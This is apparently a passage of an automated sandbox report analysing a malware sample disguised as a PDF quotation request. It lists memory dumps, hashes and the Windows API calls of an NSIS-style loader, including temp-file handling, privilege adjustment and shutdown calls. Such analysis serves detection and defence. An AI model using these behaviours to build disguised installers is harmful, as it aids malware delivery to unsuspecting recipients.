                                                                                                                                  • Instruction Fuzzy Hash: 3AE02B3080A38A9FC302CF74D801AE6BF749B03311F0081E6D81863262DB310F20C392
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f3e73d595a5be2adc03b9f9b92a219c1c86c5da6e2576f347566f185b201aa27
                                                                                                                                  • Instruction ID: 2d6707e3fd42b7d1f3103e89c27e73df1d19edefd0e9b4ef59037cf632b731a8
                                                                                                                                  • Opcode Fuzzy Hash: f3e73d595a5be2adc03b9f9b92a219c1c86c5da6e2576f347566f185b201aa27
                                                                                                                                  • Instruction Fuzzy Hash: 67D05B31D2022B97CB11E7A5DC044DFF738EED5265B504626D51837140FB703659C6E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e3bcc12a0d66ca2493e0139fc9ccd7b78632be109c3838f43ff05e644181e0c7
                                                                                                                                  • Instruction ID: f9ffe9a00a478c7712e386aa1ab12497229c5101140ad6e5366346709cbc8dad
                                                                                                                                  • Opcode Fuzzy Hash: e3bcc12a0d66ca2493e0139fc9ccd7b78632be109c3838f43ff05e644181e0c7
                                                                                                                                  • Instruction Fuzzy Hash: 3EE02B3451A384CFC700873C9444721FBA8AF8371CF5460D9D0894BB36C691BC00D789
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2351fe47019a5b11a23db5dc2e13f641ca3a34e402367fdcfd56cb2cf80ddef5
                                                                                                                                  • Instruction ID: 4edcafc235c0e9cfef0f8ac18cdf82a17cbf8ab951e10fcf65ad25ad38e916ef
                                                                                                                                  • Opcode Fuzzy Hash: 2351fe47019a5b11a23db5dc2e13f641ca3a34e402367fdcfd56cb2cf80ddef5
                                                                                                                                  • Instruction Fuzzy Hash: D2D05E3220C7828FC712CB30DC59484BF70AF17214B5551DAD097CB9A3D2A69815CB01
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2fcc0640ba890939126b6ba923b26b147f7aa52320413d436246c84ce7233eb6
                                                                                                                                  • Instruction ID: d58cec79119479bfe26a72f026d62cd6daccb08e2e933134b8a6e6eef443e883
                                                                                                                                  • Opcode Fuzzy Hash: 2fcc0640ba890939126b6ba923b26b147f7aa52320413d436246c84ce7233eb6
                                                                                                                                  • Instruction Fuzzy Hash: 86D05E2210E6A00FCB16922C7828C99AF794DC712138947EBE058CB0A696990A4E839A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 896e2012b56e7b9fc57de5be9b8c2e2e0a14fb2e8f38c8f838a3ba4a52439dd9
                                                                                                                                  • Instruction ID: 650d7060257076313b386fa9ae38e20cd892ac58f24446166070d3541e2cbad7
                                                                                                                                  • Opcode Fuzzy Hash: 896e2012b56e7b9fc57de5be9b8c2e2e0a14fb2e8f38c8f838a3ba4a52439dd9
                                                                                                                                  • Instruction Fuzzy Hash: EAD02B3054C3444FC507F730BC508953B6F6FC0204F14866590064BABEDE38494BD7B1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2b7cf7946a8003a5724048b62873003091a6afe1bff14b5e28280d5c10d3e163
                                                                                                                                  • Instruction ID: 50b93425a3865ffc62b5cdef46a1d7a7ffcd2dd30739fd2b17cb925fff3bb338
                                                                                                                                  • Opcode Fuzzy Hash: 2b7cf7946a8003a5724048b62873003091a6afe1bff14b5e28280d5c10d3e163
                                                                                                                                  • Instruction Fuzzy Hash: 6ED0673AB400189FCB049F98EC808DDFBB6FB98221B048117E915A3265C6319965DB50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8ee12a7a5cb50d9a397c470629f785e714fcf568160a8544f10a60e232edd2a1
                                                                                                                                  • Instruction ID: 0dd9cf047b768fde947e31699e2a847f9879126d0ea178679eae43d90f57e9d5
                                                                                                                                  • Opcode Fuzzy Hash: 8ee12a7a5cb50d9a397c470629f785e714fcf568160a8544f10a60e232edd2a1
                                                                                                                                  • Instruction Fuzzy Hash: FBD0127081520DDFC744DFA4D805BEAB7BCEB47312F4051A9A40D63250DB725D50D799
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c5cc9651a4357427ccb7e732d405a9d3345443b64e8de3adb464ac09c5c0f62e
                                                                                                                                  • Instruction ID: b9bed5e953103ed948a98b23dd03791d53e0304e18567cdcf36eccfac71a8105
                                                                                                                                  • Opcode Fuzzy Hash: c5cc9651a4357427ccb7e732d405a9d3345443b64e8de3adb464ac09c5c0f62e
                                                                                                                                  • Instruction Fuzzy Hash: 42C01232245510174E28A21CB48099E965DCEC53217108A36B005E21188E68994FC195
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 24a5e287c15d60767750f4083ee67641d8cb137bff0f6fc921e75abfa12417bc
                                                                                                                                  • Instruction ID: 8148ca72984eeaf36ec2b147f2b8fce594d6d76f43e5c32673445dc7e4be5e93
                                                                                                                                  • Opcode Fuzzy Hash: 24a5e287c15d60767750f4083ee67641d8cb137bff0f6fc921e75abfa12417bc
                                                                                                                                  • Instruction Fuzzy Hash: 75C08C74011E098BE6042F50BC0CB79B7B8B707323FC82D10E00D02871CBB89424CA44
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a1d691301729d9d824ea694733f30f80a99c99cba67a9233cc3b8ec5c11428b4
                                                                                                                                  • Instruction ID: 5e399f95e139b3778fb93e54e2458700bdbd46e54e45a50ae13464853f97816b
                                                                                                                                  • Opcode Fuzzy Hash: a1d691301729d9d824ea694733f30f80a99c99cba67a9233cc3b8ec5c11428b4
                                                                                                                                  • Instruction Fuzzy Hash: 99C012300543084EC549EB65FD45965776EBB802047548520A0060757EEFB8594A8AD0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f94995a20ccfa0998406b59b9960dd4e662d5366434739e7b2911b43061c8016
                                                                                                                                  • Instruction ID: 91bcb2bc807fdfd25c3f7423668ca710465af34ad974dcfb2f6c51a5aed4f6ff
                                                                                                                                  • Opcode Fuzzy Hash: f94995a20ccfa0998406b59b9960dd4e662d5366434739e7b2911b43061c8016
                                                                                                                                  • Instruction Fuzzy Hash: DAC08C302A82048FE6009A1DC984A2173ACEF85B04F0028E0F108CB635CB22FC048604
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4cffcc435bc626dd6f89ee78686460ee9227fabe39c7c323abf21b46cd6cabd9
                                                                                                                                  • Instruction ID: 002ed668cbcbffe1de30e7fade01dc3e673ce3dec4e9cf8ab8388658aea88062
                                                                                                                                  • Opcode Fuzzy Hash: 4cffcc435bc626dd6f89ee78686460ee9227fabe39c7c323abf21b46cd6cabd9
                                                                                                                                  • Instruction Fuzzy Hash: 57A022B0B02A008FCF08CF30C22808833A0FF0030030200AFB00FC30A0CA30A008CB02
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5965fc96c5253a84d7572ff7f3b2394a1a00c2ae1e37959577d805e014636274
                                                                                                                                  • Instruction ID: b2b87759b1612eb36ff0347e2001e0bdd41346efa6db2734f629ce2a197ba042
                                                                                                                                  • Opcode Fuzzy Hash: 5965fc96c5253a84d7572ff7f3b2394a1a00c2ae1e37959577d805e014636274
                                                                                                                                  • Instruction Fuzzy Hash: 5EA0223C300002C3C308EB28E000C0FF3832FE0A08B00C02C0008030E08820CC028023
                                                                                                                                  APIs
                                                                                                                                  • SetErrorMode.KERNEL32 ref: 004032C2
                                                                                                                                  • GetVersion.KERNEL32 ref: 004032C8
                                                                                                                                  • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403318
                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 0040331F
                                                                                                                                  • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 0040333B
                                                                                                                                  • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 00403350
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,0043F000,00000000), ref: 00403363
                                                                                                                                  • CharNextW.USER32(00000000,0043F000,00000020), ref: 0040338A
                                                                                                                                    • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                                    • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                                  • GetTempPathW.KERNEL32(00000400,00441800), ref: 004034C5
                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(00441800,000003FB), ref: 004034D6
                                                                                                                                  • lstrcatW.KERNEL32(00441800,\Temp), ref: 004034E2
                                                                                                                                  • GetTempPathW.KERNEL32(000003FC,00441800,00441800,\Temp), ref: 004034F6
                                                                                                                                  • lstrcatW.KERNEL32(00441800,Low), ref: 004034FE
                                                                                                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,00441800,00441800,Low), ref: 0040350F
                                                                                                                                  • SetEnvironmentVariableW.KERNEL32(TMP,00441800), ref: 00403517
                                                                                                                                  • DeleteFileW.KERNEL32(00441000), ref: 0040352B
                                                                                                                                    • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                                  • OleUninitialize.OLE32(?), ref: 004035F6
                                                                                                                                  • ExitProcess.KERNEL32 ref: 00403618
                                                                                                                                  • lstrcatW.KERNEL32(00441800,~nsu,0043F000,00000000,?), ref: 0040362B
                                                                                                                                  • lstrcatW.KERNEL32(00441800,0040A26C,00441800,~nsu,0043F000,00000000,?), ref: 0040363A
                                                                                                                                  • lstrcatW.KERNEL32(00441800,.tmp,00441800,~nsu,0043F000,00000000,?), ref: 00403645
                                                                                                                                  • lstrcmpiW.KERNEL32(00441800,00440800,00441800,.tmp,00441800,~nsu,0043F000,00000000,?), ref: 00403651
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(00441800,00441800), ref: 0040366D
                                                                                                                                  • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00435000,?), ref: 004036C7
                                                                                                                                  • CopyFileW.KERNEL32(00442800,0042AA28,00000001), ref: 004036DB
                                                                                                                                  • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403708
                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403737
                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 0040373E
                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403753
                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32 ref: 00403776
                                                                                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 0040379B
                                                                                                                                  • ExitProcess.KERNEL32 ref: 004037BE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
                                                                                                                                  • String ID: .tmp$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
                                                                                                                                  • API String ID: 3586999533-3972089011
                                                                                                                                  • Opcode ID: b76b61fe59c96232ee09de7477e4ba1d3ea630d83fddd21a04d7d9ff3721efeb
                                                                                                                                  • Instruction ID: 84ba5929d45b1413e1818888a5ef7abe037fd34abcf77f3f73da9f6cce4da4cf
                                                                                                                                  • Opcode Fuzzy Hash: b76b61fe59c96232ee09de7477e4ba1d3ea630d83fddd21a04d7d9ff3721efeb
                                                                                                                                  • Instruction Fuzzy Hash: 35D1F870500300ABD310BF659D49A3B3AADEB8174AF51443FF581B62E2DB7D8945876E
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404B48
                                                                                                                                  • GetDlgItem.USER32(?,00000408), ref: 00404B53
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B9D
                                                                                                                                  • LoadBitmapW.USER32(0000006E), ref: 00404BB0
                                                                                                                                  • SetWindowLongW.USER32(?,000000FC,00405128), ref: 00404BC9
                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BDD
                                                                                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEF
                                                                                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404C05
                                                                                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C11
                                                                                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C23
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00404C26
                                                                                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C51
                                                                                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C5D
                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF3
                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D1E
                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D32
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404D61
                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6F
                                                                                                                                  • ShowWindow.USER32(?,00000005), ref: 00404D80
                                                                                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E7D
                                                                                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EE2
                                                                                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF7
                                                                                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F1B
                                                                                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F3B
                                                                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404F50
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00404F60
                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD9
                                                                                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 00405082
                                                                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405091
                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004050B1
                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 004050FF
                                                                                                                                  • GetDlgItem.USER32(?,000003FE), ref: 0040510A
                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00405111
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                  • String ID: $M$N
                                                                                                                                  • API String ID: 1638840714-813528018
                                                                                                                                  • Opcode ID: 4cbb5e0717cdc748ffed23d4a8be9d35437acf42fd757cc9a3c8c6ab170577e7
                                                                                                                                  • Instruction ID: 943130f726a074c81f80d4b2a4465e83a32f395645510c1f9de1d6fa8cfacfb7
                                                                                                                                  • Opcode Fuzzy Hash: 4cbb5e0717cdc748ffed23d4a8be9d35437acf42fd757cc9a3c8c6ab170577e7
                                                                                                                                  • Instruction Fuzzy Hash: 0A028FB0900209EFDB209F64DD85AAE7BB5FB84314F14857AF610BA2E1C7789D42DF58
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: "$0o@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q
                                                                                                                                  • API String ID: 0-1947560563
                                                                                                                                  • Opcode ID: ba3e3f675b04ece668eb0630bdd165852bb40c5002c63e96119f9453e5b5c41c
                                                                                                                                  • Instruction ID: d166174a8608a8f2c2a53ace1dd7a40e00e89eb9ea3ae3930bfbb2a9194d4525
                                                                                                                                  • Opcode Fuzzy Hash: ba3e3f675b04ece668eb0630bdd165852bb40c5002c63e96119f9453e5b5c41c
                                                                                                                                  • Instruction Fuzzy Hash: 5632A074E01218CFDB68CF69C994B9DBBB2BF89310F1080A9D909A7361DB759E85CF50
                                                                                                                                  APIs
                                                                                                                                  • DeleteFileW.KERNEL32(?,?,75923420,00441800,0043F000), ref: 0040586F
                                                                                                                                  • lstrcatW.KERNEL32(0042F270,\*.*,0042F270,?,?,75923420,00441800,0043F000), ref: 004058B7
                                                                                                                                  • lstrcatW.KERNEL32(?,0040A014,?,0042F270,?,?,75923420,00441800,0043F000), ref: 004058DA
                                                                                                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,75923420,00441800,0043F000), ref: 004058E0
                                                                                                                                  • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,75923420,00441800,0043F000), ref: 004058F0
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 00405990
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040599F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                  • String ID: \*.*
                                                                                                                                  • API String ID: 2035342205-1173974218
                                                                                                                                  • Opcode ID: 758a93316bd333329ed0a6d4f3bd80d9b1b6158e35c963d2e10a1872ebc8ab6d
                                                                                                                                  • Instruction ID: 3422579b2d55acfa562187ab3f611d485c5dde76635b84dd87a68d04928cc13f
                                                                                                                                  • Opcode Fuzzy Hash: 758a93316bd333329ed0a6d4f3bd80d9b1b6158e35c963d2e10a1872ebc8ab6d
                                                                                                                                  • Instruction Fuzzy Hash: 4541F270900A04EADF21AB618C89BBF7678EF41724F14823BF801B51D1D77C49859E6E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: "$0o@p$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q
                                                                                                                                  • API String ID: 0-455001714
                                                                                                                                  • Opcode ID: 8a6219432b3b93f2a9232669869fdbb05b549a69255168ee01ce505f94e0c530
                                                                                                                                  • Instruction ID: 86126ff53ec0aeb97fb7bdb7b08782ac1e52c393e2bf02db471b7fef9554b9a6
                                                                                                                                  • Opcode Fuzzy Hash: 8a6219432b3b93f2a9232669869fdbb05b549a69255168ee01ce505f94e0c530
                                                                                                                                  • Instruction Fuzzy Hash: A902AEB4E002188FDB58CF69D994BDDBBB2BF89300F1081A9D908A7365DB359E85CF50
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: .5uq
                                                                                                                                  • API String ID: 0-910421107
                                                                                                                                  • Opcode ID: 251b4266069ba574f255fb5074ce61cf02d81f30dbd1670efcc235d1accd9efe
                                                                                                                                  • Instruction ID: a899647c2ffd87b619fc10aaf70eadff0b5083f080de0afbbda7be81c42a439e
                                                                                                                                  • Opcode Fuzzy Hash: 251b4266069ba574f255fb5074ce61cf02d81f30dbd1670efcc235d1accd9efe
                                                                                                                                  • Instruction Fuzzy Hash: F062AA74A01228CFDB64DF65C980BDDBBB2BF89310F5085EAE409A7265DB359E81CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320521794.0000000037CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37CA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37ca0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 85b72716d6f7459405f328aaed492457c22e272bce90394f160e70b4b222e2b1
                                                                                                                                  • Instruction ID: 2ddc13b1f937ae4187fd80d5c3b9399d042b9e6136d76acf0ec39ac073e080c6
                                                                                                                                  • Opcode Fuzzy Hash: 85b72716d6f7459405f328aaed492457c22e272bce90394f160e70b4b222e2b1
                                                                                                                                  • Instruction Fuzzy Hash: 9BC1C074E00219CFDB54DFA5C994BADBBB2BF89301F1081A9D809AB365DB349E85CF50
                                                                                                                                  Memory Dump Source
